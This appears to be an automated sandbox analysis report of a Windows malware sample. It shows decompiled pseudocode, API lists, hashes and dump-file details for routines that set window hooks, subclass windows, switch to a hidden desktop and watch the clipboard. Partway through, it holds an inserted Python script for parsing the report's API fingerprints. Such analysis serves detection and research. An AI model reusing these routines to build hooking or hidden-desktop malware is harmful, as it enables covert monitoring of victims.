                                          • Instruction Fuzzy Hash: 6F1130322046418BEB24DF26E69476EB3A0F789B84F54C128EA5E47B58DF3CC554CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$AddressCloseModuleOpenProcProcess
                                          • String ID: IsWow64Process$KERNEL32.DLL
                                          • API String ID: 4274107956-1193389583
                                          • Opcode ID: 434b8af0983253bbef5f31948a8af9820ff804dbdceb49331d61c99ac6c5cda3
                                          • Instruction ID: ee76dda234e3aa05f02979f08d8dcc8346eecd65449290c5977981b86278fce5
                                          • Opcode Fuzzy Hash: 434b8af0983253bbef5f31948a8af9820ff804dbdceb49331d61c99ac6c5cda3
                                          • Instruction Fuzzy Hash: 19019E35211F0187FF298F15F850725B2A1FB89B90F888228DE1A07B68EF3EC9488744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseEventHandleOpenlstrcpy
                                          • String ID: OPR
                                          • API String ID: 821562950-3143204451
                                          • Opcode ID: 567e6f599c3d98e3b7a68c3eda35bd34e5395db6b9f5b84365a85f538e4331ee
                                          • Instruction ID: 731d0eae0d16b9decd10739d47742ea9a65cab1ac6c3ac17b98a660123432e4e
                                          • Opcode Fuzzy Hash: 567e6f599c3d98e3b7a68c3eda35bd34e5395db6b9f5b84365a85f538e4331ee
                                          • Instruction Fuzzy Hash: BE01447230494692FF218B14F85479A7361FB88B88F84C222964E07974DF3CC54DC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 18%
                                          			E00C698D0(void* __ecx, long long __rbx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, intOrPtr* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                                          				char _v31;
                                          				short _v33;
                                          				char _v37;
                                          				char _v38;
                                          				char _v40;
                                          				long _t34;
                                          				char _t36;
                                          				void* _t39;
                                          				signed char _t41;
                                          				signed int _t42;
                                          				signed int _t43;
                                          				void* _t44;
                                          				signed int _t67;
                                          				long long _t70;
                                          				intOrPtr _t77;
                                          				long long _t93;
                                          				intOrPtr* _t95;
                                          				void* _t99;
                                          				long long _t101;
                                          				void* _t106;
                                          				void* _t109;
                                          				void* _t114;
                                          				intOrPtr _t116;
                                          				intOrPtr _t119;
                                          
                                          				_t109 = __r9;
                                          				_t85 = __rdx;
                                          				_t73 = __rbx;
                                          				_t70 = _t101;
                                          				 *((long long*)(_t70 + 8)) = __rbx;
                                          				 *((long long*)(_t70 + 0x10)) = __rbp;
                                          				 *((long long*)(_t70 + 0x18)) = __rsi;
                                          				 *((long long*)(_t70 + 0x20)) = __rdi;
                                          				_push(_t114);
                                          				_t95 = __r8;
                                          				_t99 = __rdx;
                                          				r14d = __ecx;
                                          				if(__ecx != 0 || __r8 == 0) {
                                          					L27:
                                          					__eflags = 0;
                                          					_t34 = CallNextHookEx(??, ??, ??, ??);
                                          					goto L28;
                                          				} else {
                                          					r12d =  *((intOrPtr*)(__r8 + 0x10));
                                          					_t93 =  *((intOrPtr*)(__r8 + 0x18));
                                          					_t119 =  *0xc95760; // 0x0
                                          					_v40 =  *"/0" & 0x0000ffff;
                                          					_t36 =  *0xc89b9e; // 0x0
                                          					_v38 = _t36;
                                          					_v37 = 0;
                                          					_v33 = 0;
                                          					_v31 = 0;
                                          					_t39 = r12d - 1;
                                          					if(_t39 == 0) {
                                          						_t116 =  *__r8;
                                          						r8d = 0xa;
                                          						GetClassNameA(??, ??, ??);
                                          						_t41 = E00C7BCD8(__rbx,  &_v40, _t93, __r8, __rdx);
                                          						__eflags = _t41 & 0x00000040;
                                          						if((_t41 & 0x00000040) != 0) {
                                          							__eflags =  *(_t116 + 0x30) & 0x80cf0000;
                                          							if(( *(_t116 + 0x30) & 0x80cf0000) != 0) {
                                          								_t42 =  *(_t116 + 0x48);
                                          								__eflags = 0x00080000 & _t42;
                                          								if((0x00080000 & _t42) == 0) {
                                          									_t43 = _t42 | 0x00080000;
                                          									__eflags = _t43;
                                          									 *(_t116 + 0x48) = _t43;
                                          								}
                                          							}
                                          						}
                                          						_t106 = _t99;
                                          						_t34 = CallNextHookEx(??, ??, ??, ??);
                                          						__eflags = _t70;
                                          						if(__eflags == 0) {
                                          							_t77 =  *0xc95760; // 0x0
                                          							_t34 = E00C69814(0, __eflags, _t70, _t77, _t93, _t106);
                                          						}
                                          						L26:
                                          						L28:
                                          						return _t34;
                                          					}
                                          					_t44 = _t39 - 0x13;
                                          					if(_t44 == 0) {
                                          						__eflags =  *0xc95768; // 0x0
                                          						if(__eflags == 0) {
                                          							L17:
                                          							_t70 =  *0xc95730; // 0x0
                                          							__eflags = _t70;
                                          							if(_t70 == 0) {
                                          								goto L27;
                                          							}
                                          							__eflags = r12d -  *((intOrPtr*)(_t70 + 0x150));
                                          							if(r12d !=  *((intOrPtr*)(_t70 + 0x150))) {
                                          								goto L27;
                                          							}
                                          							E00C68F68(_t70, _t73, _t93, _t99, _t95, _t109);
                                          							L15:
                                          							_t34 = E00C7BF00();
                                          							__eflags = _t34;
                                          							if(_t34 != 0) {
                                          								__imp__SetWindowLongPtrA();
                                          							}
                                          							goto L26;
                                          						}
                                          						__eflags = _t93 -  *((intOrPtr*)(_t119 + 0x118));
                                          						if(_t93 ==  *((intOrPtr*)(_t119 + 0x118))) {
                                          							L14:
                                          							E00C68ED4(_t70, _t85);
                                          							goto L15;
                                          						}
                                          						__eflags = _t93 -  *((intOrPtr*)(_t119 + 0x110));
                                          						if(_t93 !=  *((intOrPtr*)(_t119 + 0x110))) {
                                          							goto L17;
                                          						}
                                          						goto L14;
                                          					}
                                          					if(_t44 != 0x72 || __rdx == 0 || E00C7A6C4() != 0) {
                                          						goto L17;
                                          					} else {
                                          						_t67 =  *0xc95768; // 0x0
                                          						if(_t67 != 0) {
                                          							goto L17;
                                          						} else {
                                          							r8d = _t114 + 0xa;
                                          							GetClassNameA(??, ??, ??);
                                          							_t34 = E00C7BF00();
                                          							if(_t34 != 0) {
                                          								r8d = 0;
                                          								__imp__SetWindowLongPtrA();
                                          							}
                                          							goto L28;
                                          						}
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • SetWindowLongPtrA.USER32 ref: 00C6999F
                                          • GetClassNameA.USER32 ref: 00C69985
                                            • Part of subcall function 00C7BF00: GetClassNameA.USER32 ref: 00C7BF36
                                            • Part of subcall function 00C7BF00: lstrcmpiA.KERNEL32(?,?,?,?,00000000,00C699DE), ref: 00C7BF4C
                                          • SetWindowLongPtrA.USER32 ref: 00C699EE
                                          • GetClassNameA.USER32 ref: 00C69A3C
                                          • CallNextHookEx.USER32 ref: 00C69A7E
                                          • CallNextHookEx.USER32 ref: 00C69AAB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClassName$CallHookLongNextWindow$lstrcmpi
                                          • String ID:
                                          • API String ID: 1853066352-0
                                          • Opcode ID: 729799f8ab8c0cee888293cf45e2c5de64efade555db66f4cce609378a8f80ed
                                          • Instruction ID: 3c1a77a1570249f042079a17dafa48438278e807d9aac8c37acc0b058ca2c426
                                          • Opcode Fuzzy Hash: 729799f8ab8c0cee888293cf45e2c5de64efade555db66f4cce609378a8f80ed
                                          • Instruction Fuzzy Hash: DD41F23521475082EB34DFA69984779B3A5F749BC0F48822ADE1E83B69EF38CA45C701
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$KillLongTimer$DeleteObjectProc
                                          • String ID:
                                          • API String ID: 209327671-0
                                          • Opcode ID: fe36ff5e4f342783de0cd3178f3c10fb3d51a000140d2ee29ebfd44a83132c97
                                          • Instruction ID: 287b40f4e00b2fbed615c18b2c57a9d6ecb0cfba7edb4382ecc9768a0eb7d126
                                          • Opcode Fuzzy Hash: fe36ff5e4f342783de0cd3178f3c10fb3d51a000140d2ee29ebfd44a83132c97
                                          • Instruction Fuzzy Hash: 39118725304AC081E919AB27A814735A750A786FE4F68A125DD7B07F64CE79C74A830C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E00C6250C(void* __edx, void* __ebp, long long __rax, long long __rbx, intOrPtr __rcx, void* __rsi, void* __rbp, void* __r9, long long _a8) {
                                          				signed int _t29;
                                          				long long _t51;
                                          				long long _t52;
                                          				void* _t59;
                                          				void* _t60;
                                          
                                          				_t60 = __rbp;
                                          				_t59 = __rsi;
                                          				_t54 = __rcx;
                                          				_t52 = __rbx;
                                          				_t51 = __rax;
                                          				_a8 = __rbx;
                                          				 *0xc95688 = __rcx;
                                          				_t29 = 0;
                                          				GetModuleHandleA(??);
                                          				 *0xc95680 = __rax;
                                          				if((dil & 0x00000001) != 0) {
                                          					 *0xc95674 = GetVersion();
                                          				}
                                          				if((dil & 0x00000002) != 0) {
                                          					 *0xc95670 = GetCurrentProcessId();
                                          				}
                                          				if((dil & 0x00000004) == 0) {
                                          					L6:
                                          					if((dil & 0x00000008) == 0) {
                                          						L9:
                                          						if((dil & 0x00000010) != 0) {
                                          							r9d = 0;
                                          							r8d = 0;
                                          							CreateEventA(??, ??, ??, ??);
                                          							 *0xc956a0 = _t51;
                                          							if(_t51 == 0) {
                                          								_t29 = GetLastError();
                                          							}
                                          						}
                                          						if(_t29 == 0) {
                                          							goto L14;
                                          						} else {
                                          							goto L13;
                                          						}
                                          					}
                                          					_t29 = 0 | E00C64588(_t51, _t52, _t54, 0xc95690, _t59, _t60) != 0x00000000;
                                          					if(_t29 != 0) {
                                          						goto L13;
                                          					}
                                          					_t14 = _t52 + 0x5c; // 0x5c
                                          					r8d = _t14;
                                          					__imp__StrRChrA();
                                          					_t51 = _t51 + 1;
                                          					 *0xc956a8 = _t51;
                                          					 *0xc9567c = E00C6A6B4(_t51, _t52, _t51);
                                          					goto L9;
                                          				} else {
                                          					_t54 =  *0xc95688; // 0xc60000
                                          					_t29 = _t29 & 0xffffff00 | E00C64588(_t51, _t52, _t54, 0xc95698, _t59, _t60) != 0x00000000;
                                          					if(_t29 != 0) {
                                          						L13:
                                          						E00C62604();
                                          						L14:
                                          						return _t29;
                                          					}
                                          					goto L6;
                                          				}
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62523
                                          • GetVersion.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62536
                                          • GetCurrentProcessId.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62548
                                          • StrRChrA.SHLWAPI(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625A2
                                          • CreateEventA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625D2
                                          • GetLastError.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625E4
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateCurrentErrorEventHandleLastModuleProcessVersion
                                          • String ID:
                                          • API String ID: 3503360540-0
                                          • Opcode ID: f16d1539bd2f65609fe003e990ee71d11e921794c29bf74a6617c6d839d2ad31
                                          • Instruction ID: 828273df56dcda8392aef3d5ec09f1d63550d1532c20dd54e6dc90de89d51b3b
                                          • Opcode Fuzzy Hash: f16d1539bd2f65609fe003e990ee71d11e921794c29bf74a6617c6d839d2ad31
                                          • Instruction Fuzzy Hash: 0A217571201F038AFB369F79FCEAB1A3264BB44710FC58239AA1A46765EF38C559D700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateMutexA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D43E
                                          • CreateEventA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D45A
                                          • CreateThread.KERNEL32 ref: 00C7D483
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D495
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4AD
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4C7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$CloseHandle$ErrorEventLastMutexThread
                                          • String ID:
                                          • API String ID: 2796074661-0
                                          • Opcode ID: 7f7d18922b67cf37d871a0349ed0942a426468429fe259270f0e0cbab4677944
                                          • Instruction ID: e9df9e1907678fe059c6ae4e54af6372a8fff2b275655396bb228520b283bd5b
                                          • Opcode Fuzzy Hash: 7f7d18922b67cf37d871a0349ed0942a426468429fe259270f0e0cbab4677944
                                          • Instruction Fuzzy Hash: B1115E33619F8182FB25CF75E41176A62A1EF84B58F5882398E5E4AA14DF3DD054CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _strnicmp.NTDLL ref: 00C77C9E
                                          • lstrlenA.KERNEL32(?,?,?,00C658F8), ref: 00C77CAA
                                          • HeapAlloc.KERNEL32(?,?,?,00C658F8), ref: 00C77CC7
                                          • SetLastError.KERNEL32(?,?,?,00C658F8), ref: 00C77CD8
                                          • wsprintfA.USER32 ref: 00C77CF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocErrorHeapLast_strnicmplstrlenwsprintf
                                          • String ID: %s_%s
                                          • API String ID: 2400951762-4036411895
                                          • Opcode ID: 23ee21b05c7748051f9f1d50e02058e86550211944fd45476bbf73ee0ced23dd
                                          • Instruction ID: 30b83018f9ffc7223134b25dd64051e1be3c065e58453ce2a0c6010a80d538fc
                                          • Opcode Fuzzy Hash: 23ee21b05c7748051f9f1d50e02058e86550211944fd45476bbf73ee0ced23dd
                                          • Instruction Fuzzy Hash: 070180A5705B8185EB14CF17E9087597361FB88FC4F98C131DE5A47B24EF39D6468704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A161
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A185
                                          • SetWindowLongPtrA.USER32 ref: 00C6A1A0
                                          • HeapFree.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A1B9
                                          • EnterCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A1C6
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A1DF
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$FreeHeapLongWindow
                                          • String ID:
                                          • API String ID: 1749895167-0
                                          • Opcode ID: 5a84ace84734c5070f8dd0e96ef9f7c20d59b1d3efb949e0b72890693804090f
                                          • Instruction ID: 808d002acd683046abb22b53f0cbc32e624374dbecd0e245af4f26f6279513f1
                                          • Opcode Fuzzy Hash: 5a84ace84734c5070f8dd0e96ef9f7c20d59b1d3efb949e0b72890693804090f
                                          • Instruction Fuzzy Hash: 7311F372611E45C2FB11CF25E898BAC3320F788F69F958212D90E43664CF38C98AC714
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E00C83940(void* __ecx, void* __edx, void* __eflags, void* __rax, void* __rcx, void* __rsi, void* __r8, void* __r9) {
                                          				void* _v56;
                                          				void* __rbx;
                                          				int _t14;
                                          				void* _t15;
                                          				void* _t27;
                                          				void* _t28;
                                          
                                          				_t27 = __rax;                                                    // 0x00c83940
                                          				_t28 = __rcx;                                                    // 0x00c83946
                                          				SetThreadDesktop(??);                                            // 0x00c83950
                                          				E00C82F5C(__eflags, __rcx, __rcx, __rsi, __r8, __r9);            // 0x00c83959
                                          				E00C83DF0(_t27, _t28, _t28);                                     // 0x00c83961
                                          				 *(_t28 + 0x160) = 1;                                            // 0x00c83966
                                          				while(WaitForSingleObject() == 0x102) {                          // 0x00c8399f
                                          					r9d = 0;                                                     // 0x00c83972
                                          					r8d = 0;                                                     // 0x00c8397a
                                          					_t14 = GetMessageA(??, ??, ??, ??);                          // 0x00c8397f
                                          					__eflags = _t14;                                             // 0x00c83985
                                          					if(_t14 != 0) {                                              // 0x00c83987
                                          						TranslateMessage();                                      // 0x00c8398e
                                          						DispatchMessageA(??);                                    // 0x00c83999
                                          						continue;
                                          					}                                                            // 0x00c83999
                                          					break;
                                          				}                                                                // 0x00c83987
                                          				if( *((intOrPtr*)(_t28 + 0x178)) != 0) {                         // 0x00c839bc
                                          					DestroyWindow();                                             // 0x00c839be
                                          				}                                                                // 0x00c839be
                                          				_t15 = E00C83E78(_t28);                                          // 0x00c839c7
                                          				 *(_t28 + 0x160) =  *(_t28 + 0x160) & 0x00000000;                // 0x00c839cc
                                          				return _t15;                                                     // 0x00c839d8
                                          			}

                                          APIs
                                          • SetThreadDesktop.USER32 ref: 00C83950
                                            • Part of subcall function 00C82F5C: GetModuleHandleA.KERNEL32 ref: 00C82FA7
                                            • Part of subcall function 00C82F5C: RegisterClassA.USER32 ref: 00C82FCD
                                            • Part of subcall function 00C82F5C: CreateFontA.GDI32 ref: 00C83016
                                            • Part of subcall function 00C82F5C: GetWindowRect.USER32 ref: 00C8307E
                                            • Part of subcall function 00C83DF0: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E01
                                            • Part of subcall function 00C83DF0: CreateWindowExA.USER32 ref: 00C83E3D
                                            • Part of subcall function 00C83DF0: SetClipboardViewer.USER32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E52
                                          • GetMessageA.USER32 ref: 00C8397F
                                          • TranslateMessage.USER32 ref: 00C8398E
                                          • DispatchMessageA.USER32 ref: 00C83999
                                          • WaitForSingleObject.KERNEL32 ref: 00C839A5
                                          • DestroyWindow.USER32 ref: 00C839BE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessageWindow$CreateHandleModule$ClassClipboardDesktopDestroyDispatchFontObjectRectRegisterSingleThreadTranslateViewerWait
                                          • String ID:
                                          • API String ID: 2444732902-0
                                          • Opcode ID: 7fccda8fa386c8fb0796f1e13cdcea64bada8cf420905afb47aa170bcedefb7e
                                          • Instruction ID: 7bea1da6a44fc036155500c5d6b49874d7e1cd5954b1a56373c1db0bb63d8bba
                                          • Opcode Fuzzy Hash: 7fccda8fa386c8fb0796f1e13cdcea64bada8cf420905afb47aa170bcedefb7e
                                          • Instruction Fuzzy Hash: 5E012C3261098082FB20BF31E8597692371FB99F49F986221E94F46554CF38C249C708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentHandleObjectOpenSingleTerminateThreadWaitWindow
                                          • String ID:
                                          • API String ID: 127232891-0
                                          • Opcode ID: 2c4dcb04ce26b1b6f583cc76be3a49e1331b19ea2b6b309021377cc26d99b77e
                                          • Instruction ID: cf1afa57161ef6700a4b6b3b220564603eafcccf9904083c6198e22527447f25
                                          • Opcode Fuzzy Hash: 2c4dcb04ce26b1b6f583cc76be3a49e1331b19ea2b6b309021377cc26d99b77e
                                          • Instruction Fuzzy Hash: FEF03076715B4186FB18DB26EC04B296361AF88B81F88D674D90B46B64EF3CC989C714
                                          Uniqueness

                                          Uniqueness Score: -1.00%
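The "API ID" line under each function's Similarity heading is the report's address-independent fingerprint of a routine: it is built from the API names alone, so the same function can be matched across samples and across re-based dumps even though every `ref:` address differs. The script below is an added example, not code from the report or from Joe Sandbox. It parses an "APIs" block of this page into structured records, rebuilds the API ID string with a token rule inferred from the six API ID lines on this page (split names at uppercase letters, drop tokens shorter than four characters such as Get, Set, Ex, Ptr and the A suffix, count tokens over all listed calls, emit groups of decreasing count joined by "$", each group sorted and concatenated; that rule is an assumption, not documented Joe Sandbox behaviour), and decodes the `.sdmp` dump-file names. Reading the dump-name fields as process index, dump pass, counter, base address, memory protection and memory type is likewise this example's assumption; the protection and type values themselves are decoded with the standard Win32 constants. The sample input is the APIs block of the E00C83940 function copied from above.

```python
import re
from collections import Counter

# Constructed sample input: the "APIs" block of the E00C83940 function,
# pasted from the report text (bullets and indentation as printed there).
SAMPLE_APIS = """\
• SetThreadDesktop.USER32 ref: 00C83950
  • Part of subcall function 00C82F5C: GetModuleHandleA.KERNEL32 ref: 00C82FA7
  • Part of subcall function 00C82F5C: RegisterClassA.USER32 ref: 00C82FCD
  • Part of subcall function 00C82F5C: CreateFontA.GDI32 ref: 00C83016
  • Part of subcall function 00C82F5C: GetWindowRect.USER32 ref: 00C8307E
  • Part of subcall function 00C83DF0: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E01
  • Part of subcall function 00C83DF0: CreateWindowExA.USER32 ref: 00C83E3D
  • Part of subcall function 00C83DF0: SetClipboardViewer.USER32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E52
• GetMessageA.USER32 ref: 00C8397F
• TranslateMessage.USER32 ref: 00C8398E
• DispatchMessageA.USER32 ref: 00C83999
• WaitForSingleObject.KERNEL32 ref: 00C839A5
• DestroyWindow.USER32 ref: 00C839BE
"""

# One report line: "[•] [Part of subcall function X:] Name.MODULE[(args)][,] ref: ADDR"
API_LINE = re.compile(
    r"^\s*(?:\u2022\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text):
    """Parse one 'APIs' block into dicts with api, module, args, ref and subcall."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Strings" carry no call
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def _camel_tokens(name):
    # "GetModuleHandleA" -> Get, Module, Handle, A; "lstrlenA" -> lstrlen, A;
    # "_strnicmp" stays one token.
    return re.findall(r"[^A-Z]+|[A-Z][^A-Z]*", name)


def api_id(api_names, min_len=4):
    """Rebuild the report's 'API ID' string (rule inferred from this page; an assumption)."""
    counts = Counter(t for n in api_names for t in _camel_tokens(n) if len(t) >= min_len)
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def api_id_of_block(text):
    """API ID for a pasted 'APIs' block, subcall entries included as the report does."""
    return api_id(c["api"] for c in parse_api_lines(text))


# Win32 MEMORY_BASIC_INFORMATION.Protect / .Type values (real constants).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_dump_name(name):
    """Decode '<proc>.<pass>.<counter>.<base>.<protect>.<type>.sdmp'.

    The field meaning is this example's reading of the names on the page (assumption);
    protect/type are decoded with the constants above.
    """
    if name.endswith(".sdmp"):
        name = name[:-5]
    proc, dump_pass, counter, base, protect, mtype = name.split(".")
    p, t = int(protect, 16), int(mtype, 16)
    return {
        "process_index": int(proc), "pass": int(dump_pass), "counter": int(counter),
        "base": int(base, 16),
        "protect": PAGE_PROTECT.get(p & 0xFF, hex(p)),  # mask PAGE_GUARD/NOCACHE modifiers
        "type": MEM_TYPE.get(t, hex(t)),
    }


if __name__ == "__main__":
    print(api_id_of_block(SAMPLE_APIS))
    print(parse_dump_name("00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp"))
```

Run over the E00C83940 block the function returns exactly the API ID printed on the page, and the same rule reproduces the other four API IDs above, so the tokenisation can be used to cluster functions from other reports against these. On the dump names, every dump of this image decodes with type 0x00020000 (MEM_PRIVATE) and section-like protections (execute-read at 0xC61000, read-only at 0xC88000 and 0xC97000, read-write at 0xC60000 and 0xC90000) while the report marks them "based on PE: true"; a PE laid out in private rather than image-mapped memory is what VirtualQuery shows for a manually mapped or injected payload, as opposed to a module mapped by the loader.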

                                          C-Code - Quality: 36%
                                          			E00C7CA1C(void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __r8, void* __r9) {
                                          				void* __rbp;
                                          				intOrPtr _t56;
                                          				void* _t65;
                                          				signed char _t66;
                                          				intOrPtr _t68;
                                          				intOrPtr _t69;
                                          				signed int _t71;
                                          				signed int _t74;
                                          				signed int _t77;
